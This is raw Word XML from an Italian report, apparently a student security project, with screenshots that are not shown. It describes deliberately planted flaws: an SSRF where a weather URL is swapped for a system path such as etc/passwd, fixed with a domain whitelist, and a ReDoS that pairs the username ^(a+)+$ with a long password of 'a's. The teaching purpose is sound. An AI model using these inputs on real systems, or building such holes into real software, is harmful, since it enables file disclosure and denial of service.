        <w:t xml:space="preserve">un task periodico </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che ogni 30 secondi incrementa il credito, bloccando la possibilità che l’utente possa modificare l’oggetto serializzato e reinviarlo al server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61786096" w14:textId="156217A6" w:rsidR="004E3997" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251717632" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="02ED3A58" wp14:editId="0579A42C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-287655</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5732568" cy="5794803"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14147529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568" cy="5794803"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C740AEC" w14:textId="77777777" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3A4C2539" w14:textId="774BC96B" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="38183F2D" w14:textId="72B5B0D8" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4CAD8DD7" w14:textId="068629F3" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="35FF7A3B" w14:textId="55E63779" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="309FE05B" w14:textId="4010E027" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="36EF62CE" w14:textId="52F4606B" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="74306243" w14:textId="19D9E13D" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6EAF361A" w14:textId="701CA13A" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7D2F5AA3" w14:textId="4B75F92A" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6A3E4C4E" w14:textId="13CEA42D" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3750DD8F" w14:textId="62B45578" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="11F7A53F" w14:textId="25EA8B1B" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="49884262" w14:textId="4CAC5711" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1F2A00B4" w14:textId="7DBDD47C" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5B15D8E6" w14:textId="11839ADB" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4FA025F7" w14:textId="4ED0707D" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3D6410FD" w14:textId="4C927F2C" w:rsidR="004E3997" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251716608" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7C02E7A7" wp14:editId="2B259C3E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>86995</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7127875" cy="1290320"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:wrapNone/>
            <wp:docPr id="15361509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27875" cy="1290320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0823C77A" w14:textId="79C4DE21" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="589C3028" w14:textId="356A5D85" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6F6B724D" w14:textId="796E364E" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="72A7439C" w14:textId="7E2411AF" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5CC8FA30" w14:textId="2A7C50BE" w:rsidR="004E3997" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251714560" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A04EA61" wp14:editId="7E325466">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>71120</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3200053" cy="1808515"/>
            <wp:effectExtent l="0" t="0" r="635" b="1270"/>
            <wp:wrapNone/>
            <wp:docPr id="18720704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0053" cy="1808515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7F5D0B" w14:textId="4F9CD0FD" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="26D77838" w14:textId="0D15A711" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3199D3B5" w14:textId="56EC704C" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5591AB62" w14:textId="6889843C" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="18E15DC1" w14:textId="25F25FCE" w:rsidR="00EF10FE" w:rsidRDefault="00EF10FE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7911C580" w14:textId="0E8B660C" w:rsidR="00EF10FE" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251735040" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2E86598C" wp14:editId="14D69089">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-459740</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3742798" cy="2987040"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="9083548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2798" cy="2987040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C183171" w14:textId="479A8920" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1E9C324F" w14:textId="3ADFDEE3" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3FA7ECC7" w14:textId="4A7A6A6B" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="570673D5" w14:textId="06955180" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0662716E" w14:textId="6C4F13A9" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="48F0ABCA" w14:textId="053D0DB3" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5AFE0051" w14:textId="77777777" w:rsidR="00EF10FE" w:rsidRDefault="00EF10FE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="36EDBDB7" w14:textId="77777777" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2C60141F" w14:textId="59B5973E" w:rsidR="00E464AA" w:rsidRPr="00576284" w:rsidRDefault="005E7293" w:rsidP="00576284">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00576284">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> S</w:t>
      </w:r>
      <w:r w:rsidR="00171715" w:rsidRPr="00576284">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>erver-Side Request Forgery(SSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E127AD" w14:textId="3E9C4A90" w:rsidR="00EF10FE" w:rsidRDefault="00AD3339" w:rsidP="00467BBC">
      <w:r>
        <w:t>Lo scopo di questo attacco è di generare richieste lato server verso locazioni non consentite, in particolare l’attaccante può forzare il server a collegarsi a servizi interni o esterni con l’obiettivo di ottenere dati sensibili.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C4354B" w14:textId="5A709258" w:rsidR="002666AE" w:rsidRDefault="00AD3339" w:rsidP="00467BBC">
      <w:r>
        <w:t>In questo esempio è</w:t>
      </w:r>
      <w:r w:rsidR="005E7293">
        <w:t xml:space="preserve"> stat</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="005E7293">
        <w:t xml:space="preserve"> aggiunta la possibilità di aprire un url esterno (meteo) di openWeatherMap sul backend. Per fare l’exploit di tale vulnerabilità basta sostituire l’url con un path sensibile come etc/passwd e in tal modo si può accedere alle informazioni salvate sul server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01740302" w14:textId="77777777" w:rsidR="00AD3339" w:rsidRDefault="00AD3339" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2F82A8E2" w14:textId="7B351F51" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC">
      <w:r>
        <w:t xml:space="preserve">Meteo.jsx: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375D7D74" w14:textId="3FFF5CBD" w:rsidR="00E464AA" w:rsidRDefault="001A57CF" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251732992" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="138C2A3B" wp14:editId="4295914E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>142875</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6255268" cy="2336840"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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55268" cy="2336840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA0B0E6" w14:textId="67CEC60B" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0B000452" w14:textId="02B66077" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1723A4D0" w14:textId="7E37A1CC" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1C764485" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3692F509" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2BD5CFD7" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6A547D0B" w14:textId="77777777" w:rsidR="002666AE" w:rsidRDefault="002666AE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4857CBA1" w14:textId="77777777" w:rsidR="00AD3339" w:rsidRDefault="00AD3339" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0E1DE287" w14:textId="05571BCA" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC">
      <w:r>
        <w:t>HomeController:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B91CBF7" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1EC110B6" w14:textId="067397C3" w:rsidR="005E7293" w:rsidRDefault="002666AE" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251695104" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="454F97E8" wp14:editId="68DE30D6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-470535</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7126250" cy="3354565"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="97381350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26250" cy="3354565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C4B2B3" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="07DA8F4C" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3D3F817A" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="499C3B31" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1881CAAF" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="084A564A" w14:textId="5E5A0641" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0B6522C4" w14:textId="3D1F4202" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="33609817" w14:textId="205C7F77" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="67FCA15F" w14:textId="77777777" w:rsidR="002666AE" w:rsidRDefault="002666AE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="069BB887" w14:textId="6FA3CCAA" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC">
      <w:r>
        <w:t>Caso normale:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322FB0B4" w14:textId="79EF7FEE" w:rsidR="005E7293" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251696128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="380C5466" wp14:editId="740BCD10">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>8890</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4985385" cy="2983215"/>
            <wp:effectExtent l="0" t="0" r="5715" b="8255"/>
            <wp:wrapNone/>
            <wp:docPr id="65122556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b="21747"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4985385" cy="2983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246FDB" w14:textId="3CE06234" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="78670370" w14:textId="5A468F91" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="35304F56" w14:textId="3C190449" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2131E467" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="23DC5664" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0F585680" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2028DE6F" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5E39CFF6" w14:textId="4BEB4166" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="539D528D" w14:textId="02951DFD" w:rsidR="002666AE" w:rsidRDefault="002666AE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0FE05C6C" w14:textId="0C46DF5A" w:rsidR="005E7293" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251697152" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="09E14F7E" wp14:editId="1DD4C736">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>353695</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6568289" cy="2588960"/>
            <wp:effectExtent l="0" t="0" r="4445" b="1905"/>
            <wp:wrapNone/>
            <wp:docPr id="146719652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68289" cy="2588960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="005E7293">
        <w:t>Caso con attacco:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EECFAC6" w14:textId="59AAE603" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="72DF02F5" w14:textId="0260256F" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="31ACE6E5" w14:textId="375B0F09" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3A8ECBAF" w14:textId="42E74404" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="20453C5F" w14:textId="54586EA3" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2DE68A83" w14:textId="334B34E8" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5BECCB54" w14:textId="04D9E088" w:rsidR="005E7293" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Fix: </w:t>
      </w:r>
      <w:r w:rsidR="00D83D81">
        <w:t xml:space="preserve">si usa una whitelist di domini consentiti da poter visitare lato backend in modo da bloccare i link non consentiti. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381AAA8C" w14:textId="6CDDC339" w:rsidR="00D72C3C" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0C3BDB25" w14:textId="2EA34D96" w:rsidR="00D72C3C" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5861AEA5" w14:textId="55A3E6AF" w:rsidR="00D72C3C" w:rsidRDefault="002666AE" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251718656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="39592FDF" wp14:editId="161EE7C7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-471805</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6783705" cy="3592370"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:wrapNone/>
            <wp:docPr id="13364913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83705" cy="3592370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F12D79A" w14:textId="72183ECC" w:rsidR="00D72C3C" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="48E25F87" w14:textId="50A8D7E1" w:rsidR="00D72C3C" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1CF5E927" w14:textId="2CDE2CEF" w:rsidR="00D72C3C" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="52F337BC" w14:textId="77777777" w:rsidR="00D72C3C" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="48157CE8" w14:textId="77777777" w:rsidR="00D72C3C" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="058A00F5" w14:textId="0C1D2868" w:rsidR="00D72C3C" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0B2359A3" w14:textId="77777777" w:rsidR="00D72C3C" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7C259622" w14:textId="77777777" w:rsidR="002666AE" w:rsidRDefault="002666AE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="402FDDD1" w14:textId="77777777" w:rsidR="002666AE" w:rsidRDefault="002666AE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6A1E4856" w14:textId="77777777" w:rsidR="00D72C3C" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2EEA9A69" w14:textId="5A288779" w:rsidR="005E7293" w:rsidRDefault="00A74318" w:rsidP="00A74318">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Regex DOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3F1657" w14:textId="744BF3EA" w:rsidR="00FA683C" w:rsidRDefault="00FA683C" w:rsidP="00A74318">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ReDos è un attacco di tipo Denial of Service, generato dall’utilizzo di espressioni regolari che se portati ad una situazione estrema in cui vengono inseriti tanti caratteri, fanno bloccare il programma nella fase di validazione del pattern, causando quindi un Denial of Service. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C59BB38" w14:textId="052635EE" w:rsidR="00A74318" w:rsidRDefault="00FA683C" w:rsidP="00A74318">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Nel nostro caso è</w:t>
      </w:r>
      <w:r w:rsidR="00A74318">
        <w:t xml:space="preserve"> stata introdotta una regex per validare la password con lo username, in modo tale che la password non possa contenere lo username all’interno.  Funziona con utenti normali ma mettendo come username: </w:t>
      </w:r>
      <w:r w:rsidR="00A74318" w:rsidRPr="00A74318">
        <w:t>^(a+)+$</w:t>
      </w:r>
      <w:r w:rsidR="00A74318">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF800CF" w14:textId="3308B9AE" w:rsidR="00A74318" w:rsidRDefault="00A74318" w:rsidP="00A74318">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E password: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A74318">
        <w:t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DE4DFB" w14:textId="39323D95" w:rsidR="00A74318" w:rsidRDefault="00A74318" w:rsidP="00A74318">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
